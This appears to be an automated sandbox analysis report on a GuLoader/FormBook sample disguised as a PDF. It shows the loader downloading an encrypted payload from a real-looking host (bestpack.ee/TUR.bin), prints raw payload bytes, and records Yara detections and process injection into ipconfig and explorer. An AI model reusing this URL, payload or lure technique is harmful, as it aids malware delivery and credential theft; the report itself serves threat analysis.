                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 54 55 52 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/TUR.bin">here</a>.</p></body></html>


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.2049755185.86.211.1374436708C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            TimestampBytes transferredDirectionData
                            2024-09-25 13:07:41 UTC187OUTGET /TUR.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                            Cache-Control: no-cache
                            Host: bestpack.ee
                            Connection: Keep-Alive
                            2024-09-25 13:07:41 UTC283INHTTP/1.1 200 OK
                            Date: Wed, 25 Sep 2024 13:07:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Last-Modified: Wed, 25 Sep 2024 03:59:38 GMT
                            Accept-Ranges: bytes
                            Content-Length: 288320
                            Vary: Accept-Encoding,User-Agent
                            Content-Type: application/octet-stream
                            2024-09-25 13:07:41 UTC7909INData Raw: a5 ae 24 41 7c 97 a4 07 5c 22 d9 ea f7 62 6c cb 0b c5 e3 fe 98 b7 05 33 a1 82 82 b8 4a 52 20 21 a6 c9 51 6b eb 83 d2 a9 01 10 0c cc 39 7d 7b f8 c9 5c 87 19 fd b7 a8 ef be e1 d9 cc d3 46 53 c4 e9 29 6f a9 bd d0 8d df a9 23 5c 90 0a b3 30 43 3d f0 d7 79 0d d6 4b 68 17 fe a2 3c 0c 14 20 c9 4f 35 e2 5a db 44 2a f5 d2 5c 8b c6 cb 57 71 a5 1f 7b 47 68 1d ba 17 dd 35 9e 7b c4 0d a3 bb 74 10 b8 c3 fc 15 67 13 fe 16 e1 70 32 0f b2 01 96 a5 8a cf a0 0c 8c f6 71 10 35 03 76 9a 09 d2 e2 e3 ea 1a 26 dc 63 c7 0c 7a 04 98 8f 0d 29 d3 10 40 fb be 8f ce 0f 76 a6 df ce 34 c3 1c 23 94 9d 16 f3 c0 51 90 7a b8 f4 3e 25 67 63 9f 37 a8 6a 43 12 45 d7 8b 05 e7 85 16 77 60 ea a7 77 a9 0d 9b c4 bd 87 69 8a 79 ee 32 d6 eb 4d 79 83 fc 88 4d 20 cd df 10 83 35 f6 b9 6b b4 02 22 78 1b
                            Data Ascii: $A|\"bl3JR !Qk9}{\FS)o#\0C=yKh< O5ZD*\Wq{Gh5{tgp2q5v&cz)@v4#Qz>%gc7jCEw`wiy2MyM 5k"x
                            2024-09-25 13:07:42 UTC8000INData Raw: f2 3e 80 0d 66 ce 4e a9 db 92 af 74 f1 e7 0e fa b9 fe 4d 7f 42 61 16 70 e9 91 57 e6 25 e8 9a a5 33 db 72 45 be 26 7c 3d 2b 45 21 66 38 7e a6 38 29 0f 26 bd 15 04 79 b1 10 47 ac d4 e2 9a 53 b1 de c3 af 94 59 76 08 03 8e d4 d7 d4 da 8d 6f 91 ce fc 15 03 b3 58 02 a6 d9 19 fb 90 4f 8e e0 95 e3 c5 47 51 40 81 40 95 83 11 bb b5 06 cd 20 df c3 f7 8f 28 eb 49 d5 a4 af 14 00 ce 63 29 8e 40 34 b6 e8 b6 70 67 08 98 21 90 58 16 b5 fe e2 e6 7d d9 5a 3d 87 04 f3 fd cc de 7f 70 87 52 ee ae 19 56 3f 27 e8 8a 10 8a ac e8 a7 33 42 8f dd 76 e5 fc e6 5a a1 07 db b5 04 03 f8 cc a4 70 a2 23 a1 78 54 75 eb c2 77 d7 33 bc c8 75 ab 5d c4 9a e6 7a 91 41 ae 5d 11 db ef 5d 6b 32 87 34 6d ee ee aa 81 f3 95 e2 ee 99 e2 d5 5e ff 70 ab 5c 14 c9 31 67 39 67 6a 40 1f cb 21 80 04 31 ce 00
                            Data Ascii: >fNtMBapW%3rE&|=+E!f8~8)&yGSYvoXOGQ@@ (Ic)@4pg!X}Z=pRV?'3BvZp#xTuw3u]zA]]k24m^p\1g9gj@!1
                            2024-09-25 13:07:42 UTC8000INData Raw: 84 b8 01 45 0a b7 9d e1 30 a4 2f b4 65 45 c8 63 b2 ed b4 0b 5e 1c 83 10 84 66 10 51 a7 30 3a eb 89 c3 f4 0b d1 92 33 77 87 49 5d 27 bb b2 4a 45 46 09 ea da c1 d0 5d 26 08 d7 cd 58 2d 53 af 03 4a f4 5c fd 0c 1e 37 0e 78 b3 35 1d f4 54 85 26 42 30 09 9c f6 09 9a f1 21 de ff b3 81 59 f7 db 7a b1 e3 e7 07 35 ec 0b 25 32 aa 0f 2f 8f 94 fc 5a 8f bb e9 73 61 94 e6 f7 9a a9 1f f6 d2 87 b7 6e da 05 43 c7 e9 b6 be 8e af fd e1 9f ba 90 4e 8b b1 7f 91 0a 8a d1 5d 2e 1a db 25 69 46 3d ab 6d 13 5c 7e 0d 89 b6 1e b9 7e c0 1b 37 c5 40 29 3b 78 c8 fe db b2 fc cc c0 a5 ee 63 e9 39 88 dc aa 51 32 6b d3 6e 37 75 4e 81 1d 0b 91 12 27 69 ff 2b 6b f1 2b bc c2 37 6f e5 02 2a 9b e9 6f 25 8e 8d c3 c8 3d 73 ea 9c 19 8a 82 a7 fa a5 42 cd 86 02 5a 55 49 4b a1 1c e4 9e fa 9e 1d c3 00
                            Data Ascii: E0/eEc^fQ0:3wI]'JEF]&X-SJ\7x5T&B0!Yz5%2/ZsanCN].%iF=m\~~7@);xc9Q2kn7uN'i+k+7o*o%=sBZUIK
                            2024-09-25 13:07:42 UTC8000INData Raw: e7 bb 1c 13 70 76 c6 25 05 16 af 0d ac d2 6e 30 bf 7b 6e 66 60 02 34 e2 7c cd a7 f2 66 41 11 e3 dd fb cd ac 73 04 90 ae 4c e7 c2 fc 5d 2e fb 52 88 9b 81 74 c2 90 79 7f 88 35 a9 47 a1 47 9e 49 0f a4 ac 43 76 ad 20 18 17 84 5e fe 34 25 59 1a 1c 32 10 6e 21 e8 1c 2c b3 71 cd 35 df a0 64 56 94 62 e6 8f aa c4 f5 4b 3b 21 53 23 3b 86 5b 8a 26 48 eb 85 80 c3 cf 94 bd 19 63 61 42 6e 24 84 89 9d 2b 48 b5 22 f9 b5 44 14 8a 5b e7 3a 54 f7 1d 54 f5 56 79 c7 1f 56 e7 35 91 06 ca ab 32 82 23 59 b1 ce f8 e3 60 e7 1f e4 15 d6 61 16 5c b7 30 cc d0 17 40 4f 1e b8 e7 9e 61 94 8a cf e0 b4 d9 fd 49 ab 15 2f e5 4a f5 fb ba bc 78 13 4f 29 2b 38 be 48 5d 21 d8 6b 8c 64 94 83 08 75 fb 97 e1 ba ef 91 c0 58 a8 f6 75 a6 85 87 46 b7 9f 57 d0 a5 9c d5 2d a2 28 6d 10 29 2c bf 60 31 5d
                            Data Ascii: pv%n0{nf`4|fAsL].Rty5GGICv ^4%Y2n!,q5dVbK;!S#;[&HcaBn$+H"D[:TTVyV52#Y`a\0@OaI/JxO)+8H]!kduXuFW-(m),`1]
                            2024-09-25 13:07:42 UTC8000INData Raw: c0 0b 37 6c 9e e3 55 df 86 53 f1 b5 7c 5b 82 af 90 43 b9 54 65 cd 22 4a ae e5 cd d5 74 4f 1d d5 44 78 30 dd b6 28 b7 7c 73 88 2f 60 a1 9c cd bc d6 7e f6 2f e2 7c c4 92 db a0 96 8d 8e 14 32 83 08 6b 3c 7f bb 9f 18 85 bf 2f fa d7 13 d8 c2 46 08 c6 b1 af b8 6e 63 39 0e 37 85 d3 35 bc e9 a8 8e 85 5b 07 50 e4 e7 18 bf fc 28 31 ef 63 d7 42 28 dc b5 45 4a 3a 44 ae d0 5f 9d b1 3d 3a 2d b3 82 fe ce d8 7b 79 75 7e 21 69 13 c6 7d 49 cd 56 f3 a5 c3 c8 51 c0 8f ea eb 5e 4c 88 4d 05 fc 69 7d d8 78 6a ab 76 b3 35 c8 8f a6 ef ab 3b b9 12 70 eb b9 aa 9b 71 dc b0 6b ad f6 72 6b ee cb 4c 61 20 6b c2 54 2e 6f 7d 59 52 2c 42 9b 99 99 6c 02 c4 e0 6d 05 4b 6b 71 3d f2 5c 02 5d 99 b1 ea e2 e2 1f 96 f4 65 a8 d4 40 7d 0a 19 eb 4a a5 af e0 0f db 32 c5 38 74 f8 37 cc 98 1b 0d 04 89
                            Data Ascii: 7lUS|[CTe"JtODx0(|s/`~/|2k</Fnc975[P(1cB(EJ:D_=:-{yu~!i}IVQ^LMi}xjv5;pqkrkLa kT.o}YR,BlmKkq=\]e@}J28t7
                            2024-09-25 13:07:42 UTC8000INData Raw: 01 33 c5 b5 b8 2a 24 31 36 9a a8 e4 99 92 a8 bc 17 f8 3d 73 42 0c 11 e3 1d 8f 4a 50 ff 52 9b b0 11 c7 5e 31 ef ec 05 7d 80 7e f6 b5 e0 1c 3b f8 20 71 0b ae a1 52 bf e4 f9 80 ac de f7 57 1e bb 56 bc 2a d1 7f 58 cd 07 c5 d6 58 8f fa c7 50 4e 2a 8a 3c 55 a1 81 5e 29 99 4e e0 47 ad 13 ac c0 7b 1f f7 33 fd c2 9a d5 41 d5 20 b2 45 b1 34 53 d8 ba 82 5f 20 62 6a 42 f2 a6 99 fd 66 b9 06 df d9 39 c1 f9 1e 28 41 37 8a 4d 49 52 c3 a2 79 72 a5 e6 ca ec 17 c0 24 af 14 09 52 5f e6 1e c4 e6 d7 9b 66 dc fb f2 fb 5b 3e 8b bb 8a 93 80 71 bb ff b4 9d c9 4b 93 c5 d6 e3 dc 9b 09 72 a2 35 74 ee f7 88 28 cc 06 86 b1 8b 0a 7f c8 30 ca f6 52 a5 ab b2 3d 6e 8c cb a2 27 e5 e9 4c 14 6d d4 aa e6 df a5 0e f6 ba 8f d8 3b 29 5d 08 7b 98 5e 41 7c 50 7d f5 7f c6 58 90 e7 dd 80 6e 32 9b 73
                            Data Ascii: 3*$16=sBJPR^1}~; qRWV*XXPN*<U^)NG{3A E4S_ bjBf9(A7MIRyr$R_f[>qKr5t(0R=n'Lm;)]{^A|P}Xn2s
                            2024-09-25 13:07:42 UTC8000INData Raw: 4d d5 f4 a1 34 b9 a1 7d ee 9d 77 56 42 db af d7 d1 05 81 25 d7 df 8b 46 ba 4d 95 5d 74 62 ea 0b 3c f7 1d fd 15 61 26 8e 5c 50 7b db 1b 63 08 35 56 11 e4 23 09 f3 4e 51 c8 f9 57 0e 1c 0d 54 c4 14 ad 1b 48 a4 b1 9d 15 6d 7a c5 6c 31 98 26 d9 ad d3 3f 67 0a 9a 67 e2 9c 0c 0c 5a 46 37 70 79 04 b6 28 b5 87 86 c5 38 f1 ac 5e 97 72 ea bb 72 46 a4 b5 25 62 61 f2 e6 ce 67 93 e7 02 c1 4f ff 75 fc 56 69 81 27 5b 76 b5 96 98 cb 08 b5 2e a2 11 fa b7 a7 94 72 5e 2a b2 d2 16 0c 65 d4 5b 4a 93 7a 9b b2 f3 a9 1f ec 7c ab 1f a4 be 93 15 a3 5c 28 b1 34 df 4b cf 21 93 8c c2 68 94 90 56 6d 6c 54 bd 73 56 8a fc 24 ab 85 87 02 89 21 8b f0 d1 f1 0e 9a e3 28 2e f3 85 2f b0 81 50 28 fe cd 1c 9a db 17 0c d2 0a 8b 16 e0 1b f1 09 46 c3 b4 d6 53 4e 04 1a 8f 77 e5 cb 8b 37 43 04 91 07
                            Data Ascii: M4}wVB%FM]tb<a&\P{c5V#NQWTHmzl1&?ggZF7py(8^rrF%bagOuVi'[v.r^*e[Jz|\(4K!hVmlTsV$!(./P(FSNw7C
                            2024-09-25 13:07:42 UTC8000INData Raw: bd ef 56 cf ea c6 35 37 01 a5 10 24 c2 58 74 28 aa 92 6c 22 7c 7a c4 d7 9b 1e 44 cf 74 17 80 d2 68 f0 d8 f4 05 1f 3a 39 4e 04 96 08 4e c5 f9 e7 2e c4 dd f5 d7 39 cd 74 f7 93 c3 5a c5 c2 55 d8 b2 31 82 9d b3 eb e6 93 96 69 dd de 38 56 8a 11 2e 5d f1 5d fe 54 50 32 bc 9c af f1 97 f6 95 73 2d e8 b0 95 45 f7 f8 e6 cb 8d ac 5d 13 49 be 8b 02 ac 72 c7 e3 52 6d df 9b ce a7 a8 07 23 d3 34 35 3b c6 05 55 c0 1a dc 0a 33 5c e4 96 bc e7 36 5b 32 0b 46 2f b6 9a 24 67 77 6e b9 55 ab b1 7a dd 13 65 3b 1b 7e ee cc 6d 82 72 55 29 77 a2 ae 99 15 78 f9 9f af 7b 04 82 4d 3f 56 58 5f 65 e1 1b ac 76 b0 4f 85 cc c7 cb fd d8 b1 b6 3b f3 51 f8 dc ab c1 dc 9a 60 30 84 a5 8b 18 79 da fd 2d 68 bf 49 de f8 50 04 f8 27 f6 33 ab e1 8f 56 f8 29 38 56 18 ae eb 6d 70 b1 bc f5 8d 06 99 d4
                            Data Ascii: V57$Xt(l"|zDth:9NN.9tZU1i8V.]]TP2s-E]IrRm#45;U3\6[2F/$gwnUze;~mrU)wx{M?VX_evO;Q`0y-hIP'3V)8Vmp
                            2024-09-25 13:07:42 UTC8000INData Raw: 17 7d 6c 4b 06 0e ba 13 d2 4c 2c 76 7c 9e 4e d0 73 64 8d 2a 80 f6 a2 a8 3d 5b fa e2 4a 8b a1 0f 28 05 d3 79 e3 52 dc 1b 70 4e f7 de bd 30 d7 b3 bb 5e 04 57 67 6c 51 e1 46 96 36 65 70 bc b0 30 6a eb f0 67 6e 78 bf 97 ef a5 8c 0e 3e 0a 27 8c 63 93 36 2d 7b d1 a2 42 7f f6 12 45 bc e5 08 f4 93 e6 7d 4a c1 af ce 9a db 2e e7 b2 7c c0 e1 1d a3 d8 92 e3 98 38 0c 1a fe 65 bf 67 b4 fe ac f5 b6 b3 34 69 ae e1 2c 5e f4 39 76 50 34 1e ca 23 5c e8 1a d1 36 39 29 d6 d3 5a 38 eb c4 1f fe e5 9e 55 0b da 40 40 04 17 f3 2e ff a1 dc 70 6d c8 72 c0 85 e0 fd 5a a3 33 0c b8 ee 21 13 ef 45 1f 6a 78 f9 e9 1f 0e 6b 3f ac b9 ab 11 1d 2b 19 dd 0c 6b 8d c5 71 2f 63 f3 e8 cf 04 f3 a9 f8 f7 9c f9 fd 3b 1f a3 57 d4 dc 5b 68 d7 b7 1d f5 41 d0 af c4 fc 33 35 8e 4d ec 2a 11 ac 55 ae 5a 8f
                            Data Ascii: }lKL,v|Nsd*=[J(yRpN0^WglQF6ep0jgnx>'c6-{BE}J.|8eg4i,^9vP4#\69)Z8U@@.pmrZ3!Ejxk?+kq/c;W[hA35M*UZ
                            2024-09-25 13:07:42 UTC8000INData Raw: 81 95 f7 3f f8 68 74 10 10 6b b4 c0 24 a6 00 ca 22 23 2d 35 fa 02 47 ad c6 e2 40 71 88 cd dd 5e 9c 9a 73 01 91 ef eb 4a 32 a5 6b 6f 28 6c e6 63 45 ad 70 00 7d 81 eb 40 21 06 62 89 b6 8f fe 20 ed 95 ab 0c b5 4e 6f 53 23 a4 df da c8 10 34 db e7 b1 3a 5f 84 84 e8 5c 93 93 4d 29 a4 8d e2 51 35 ca 8e bb 4f 2f 27 e3 a5 b2 c3 09 ae 3d 3f d0 4e f3 16 45 ee 88 1f 82 91 f8 3d 30 f7 bd c1 bf 8d 44 9f 4b cf d7 9c 01 83 4e 1f 38 ed d3 22 77 ab 0b ef fc d4 04 0c a9 cb 39 82 f8 89 12 c8 73 3b d1 84 ac f2 4e 9b af ac d6 45 5d 71 08 c6 32 b0 3d de ce 96 fb 6b ec 26 a9 c5 dc 42 2a 42 92 ed 37 8d c5 10 68 61 64 b0 35 10 b5 4c 0c c5 9e e1 a3 88 9d 23 2a c1 8c ee db 5f 61 67 65 02 2f 48 fc bd d6 13 d6 d5 11 2c 2c 1b 59 10 d3 a8 56 0a 26 7b 59 c4 88 36 ea 19 5f 3f 50 40 0e 0e
                            Data Ascii: ?htk$"#-5G@q^sJ2ko(lcEp}@!b NoS#4:_\M)Q5O/'=?NE=0DKN8"w9s;NE]q2=k&B*B7had5L#*_age/H,,YV&{Y6_?P@


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:09:07:18
                            Start date:25/09/2024
                            Path:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"
                            Imagebase:0x400000
                            File size:567'532 bytes
                            MD5 hash:8681AB3286A883DBFAAD479B99AEF9D1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.23445073146.0000000004F3C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:09:07:32
                            Start date:25/09/2024
                            Path:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"
                            Imagebase:0x400000
                            File size:567'532 bytes
                            MD5 hash:8681AB3286A883DBFAAD479B99AEF9D1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.23628490729.000000000170C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:09:07:53
                            Start date:25/09/2024
                            Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                            Imagebase:0x140000000
                            File size:16'696'840 bytes
                            MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            General

                            Target ID:4
                            Start time:09:07:53
                            Start date:25/09/2024
                            Path:C:\Windows\SysWOW64\ipconfig.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                            Imagebase:0xc90000
                            File size:29'184 bytes
                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:5
                            Start time:09:10:28
                            Start date:25/09/2024
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff6c92b0000
                            File size:4'849'904 bytes
                            MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:19.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:18.5%
                              Total number of Nodes:1603
                              Total number of Limit Nodes:40
                              execution_graph 5292 402643 5293 402672 5292->5293 5294 402657 5292->5294 5296 4026a2 5293->5296 5297 402677 5293->5297 5295 402d89 21 API calls 5294->5295 5305 40265e 5295->5305 5298 402dab 21 API calls 5296->5298 5299 402dab 21 API calls 5297->5299 5300 4026a9 lstrlenW 5298->5300 5301 40267e 5299->5301 5300->5305 5309 406543 WideCharToMultiByte 5301->5309 5303 402692 lstrlenA 5303->5305 5304 4026ec 5305->5304 5307 4060f2 5 API calls 5305->5307 5308 4026d6 5305->5308 5306 4060c3 WriteFile 5306->5304 5307->5308 5308->5304 5308->5306 5309->5303 4541 401946 4542 401948 4541->4542 4543 402dab 21 API calls 4542->4543 4544 40194d 4543->4544 4547 405c2d 4544->4547 4586 405ef8 4547->4586 4550 405c55 DeleteFileW 4552 401956 4550->4552 4551 405c6c 4553 405d97 4551->4553 4600 406521 lstrcpynW 4551->4600 4553->4552 4560 40687e 2 API calls 4553->4560 4555 405c92 4556 405ca5 4555->4556 4557 405c98 lstrcatW 4555->4557 4601 405e3c lstrlenW 4556->4601 4558 405cab 4557->4558 4562 405cbb lstrcatW 4558->4562 4564 405cc6 lstrlenW FindFirstFileW 4558->4564 4561 405db1 4560->4561 4561->4552 4563 405db5 4561->4563 4562->4564 4618 405df0 lstrlenW CharPrevW 4563->4618 4565 405d8c 4564->4565 4584 405ce8 4564->4584 4565->4553 4568 405d6f FindNextFileW 4572 405d85 FindClose 4568->4572 4568->4584 4569 405be5 5 API calls 4571 405dc7 4569->4571 4573 405de1 4571->4573 4574 405dcb 4571->4574 4572->4565 4576 4055a6 28 API calls 4573->4576 4574->4552 4577 4055a6 28 API calls 4574->4577 4576->4552 4579 405dd8 4577->4579 4578 405c2d 64 API calls 4578->4584 4581 4062e1 40 API calls 4579->4581 4580 4055a6 28 API calls 4580->4568 4583 405ddf 4581->4583 4582 4055a6 28 API calls 4582->4584 4583->4552 4584->4568 4584->4578 4584->4580 4584->4582 4605 406521 lstrcpynW 4584->4605 4606 405be5 4584->4606 4614 4062e1 MoveFileExW 4584->4614 4621 406521 lstrcpynW 4586->4621 4588 405f09 4622 405e9b CharNextW CharNextW 4588->4622 4591 405c4d 4591->4550 4591->4551 4592 4067cf 5 API calls 4598 405f1f 4592->4598 4593 405f50 lstrlenW 4594 405f5b 4593->4594 4593->4598 4596 405df0 3 API calls 4594->4596 4595 40687e 2 API calls 4595->4598 4597 405f60 GetFileAttributesW 4596->4597 4597->4591 4598->4591 4598->4593 4598->4595 4599 405e3c 2 API calls 4598->4599 4599->4593 4600->4555 4602 405e4a 4601->4602 4603 405e50 CharPrevW 4602->4603 4604 405e5c 4602->4604 4603->4602 4603->4604 4604->4558 4605->4584 4628 405fec GetFileAttributesW 4606->4628 4609 405c12 4609->4584 4610 405c00 RemoveDirectoryW 4612 405c0e 4610->4612 4611 405c08 DeleteFileW 4611->4612 4612->4609 4613 405c1e SetFileAttributesW 4612->4613 4613->4609 4615 406302 4614->4615 4616 4062f5 4614->4616 4615->4584 4631 406167 4616->4631 4619 405dbb 4618->4619 4620 405e0c lstrcatW 4618->4620 4619->4569 4620->4619 4621->4588 4623 405eb8 4622->4623 4626 405eca 4622->4626 4625 405ec5 CharNextW 4623->4625 4623->4626 4624 405eee 4624->4591 4624->4592 4625->4624 4626->4624 4627 405e1d CharNextW 4626->4627 4627->4626 4629 405bf1 4628->4629 4630 405ffe SetFileAttributesW 4628->4630 4629->4609 4629->4610 4629->4611 4630->4629 4632 406197 4631->4632 4633 4061bd GetShortPathNameW 4631->4633 4658 406011 GetFileAttributesW CreateFileW 4632->4658 4634 4061d2 4633->4634 4635 4062dc 4633->4635 4634->4635 4637 4061da wsprintfA 4634->4637 4635->4615 4640 40655e 21 API calls 4637->4640 4638 4061a1 CloseHandle GetShortPathNameW 4638->4635 4639 4061b5 4638->4639 4639->4633 4639->4635 4641 406202 4640->4641 4659 406011 GetFileAttributesW CreateFileW 4641->4659 4643 40620f 4643->4635 4644 40621e GetFileSize GlobalAlloc 4643->4644 4645 406240 4644->4645 4646 4062d5 CloseHandle 4644->4646 4660 406094 ReadFile 4645->4660 4646->4635 4651 406273 4653 405f76 4 API calls 4651->4653 4652 40625f lstrcpyA 4654 406281 4652->4654 4653->4654 4655 4062b8 SetFilePointer 4654->4655 4667 4060c3 WriteFile 4655->4667 4658->4638 4659->4643 4661 4060b2 4660->4661 4661->4646 4662 405f76 lstrlenA 4661->4662 4663 405fb7 lstrlenA 4662->4663 4664 405f90 lstrcmpiA 4663->4664 4665 405fbf 4663->4665 4664->4665 4666 405fae CharNextA 4664->4666 4665->4651 4665->4652 4666->4663 4668 4060e1 GlobalFree 4667->4668 4668->4646 4669 4015c6 4670 402dab 21 API calls 4669->4670 4671 4015cd 4670->4671 4672 405e9b 4 API calls 4671->4672 4685 4015d6 4672->4685 4673 401636 4675 401668 4673->4675 4676 40163b 4673->4676 4674 405e1d CharNextW 4674->4685 4679 401423 28 API calls 4675->4679 4694 401423 4676->4694 4684 401660 4679->4684 4683 40164f SetCurrentDirectoryW 4683->4684 4685->4673 4685->4674 4686 40161c GetFileAttributesW 4685->4686 4688 405aec 4685->4688 4691 405a75 CreateDirectoryW 4685->4691 4698 405acf CreateDirectoryW 4685->4698 4686->4685 4689 406915 5 API calls 4688->4689 4690 405af3 4689->4690 4690->4685 4692 405ac5 GetLastError 4691->4692 4693 405ac1 4691->4693 4692->4693 4693->4685 4695 4055a6 28 API calls 4694->4695 4696 401431 4695->4696 4697 406521 lstrcpynW 4696->4697 4697->4683 4699 405ae3 GetLastError 4698->4699 4700 405adf 4698->4700 4699->4700 4700->4685 5310 401c48 5311 402d89 21 API calls 5310->5311 5312 401c4f 5311->5312 5313 402d89 21 API calls 5312->5313 5314 401c5c 5313->5314 5315 401c71 5314->5315 5316 402dab 21 API calls 5314->5316 5317 402dab 21 API calls 5315->5317 5322 401c81 5315->5322 5316->5315 5317->5322 5318 401cd8 5321 402dab 21 API calls 5318->5321 5319 401c8c 5320 402d89 21 API calls 5319->5320 5323 401c91 5320->5323 5324 401cdd 5321->5324 5322->5318 5322->5319 5325 402d89 21 API calls 5323->5325 5326 402dab 21 API calls 5324->5326 5327 401c9d 5325->5327 5328 401ce6 FindWindowExW 5326->5328 5329 401cc8 SendMessageW 5327->5329 5330 401caa SendMessageTimeoutW 5327->5330 5331 401d08 5328->5331 5329->5331 5330->5331 5339 4028c9 5340 4028cf 5339->5340 5341 4028d7 FindClose 5340->5341 5342 402c2f 5340->5342 5341->5342 5343 40494a 5344 404980 5343->5344 5345 40495a 5343->5345 5347 404507 8 API calls 5344->5347 5346 4044a0 22 API calls 5345->5346 5348 404967 SetDlgItemTextW 5346->5348 5349 40498c 5347->5349 5348->5344 5353 701d170d 5359 701d15b6 5353->5359 5355 701d176b GlobalFree 5356 701d1740 5356->5355 5357 701d1725 5357->5355 5357->5356 5358 701d1757 VirtualFree 5357->5358 5358->5355 5360 701d15bc 5359->5360 5361 701d15c2 5360->5361 5362 701d15ce GlobalFree 5360->5362 5361->5357 5362->5357 5363 4016d1 5364 402dab 21 API calls 5363->5364 5365 4016d7 GetFullPathNameW 5364->5365 5368 4016f1 5365->5368 5372 401713 5365->5372 5366 401728 GetShortPathNameW 5367 402c2f 5366->5367 5369 40687e 2 API calls 5368->5369 5368->5372 5370 401703 5369->5370 5370->5372 5373 406521 lstrcpynW 5370->5373 5372->5366 5372->5367 5373->5372 5374 401e53 GetDC 5375 402d89 21 API calls 5374->5375 5376 401e65 GetDeviceCaps MulDiv ReleaseDC 5375->5376 5377 402d89 21 API calls 5376->5377 5378 401e96 5377->5378 5379 40655e 21 API calls 5378->5379 5380 401ed3 CreateFontIndirectW 5379->5380 5381 40263d 5380->5381 5382 402955 5383 402dab 21 API calls 5382->5383 5384 402961 5383->5384 5385 402977 5384->5385 5386 402dab 21 API calls 5384->5386 5387 405fec 2 API calls 5385->5387 5386->5385 5388 40297d 5387->5388 5410 406011 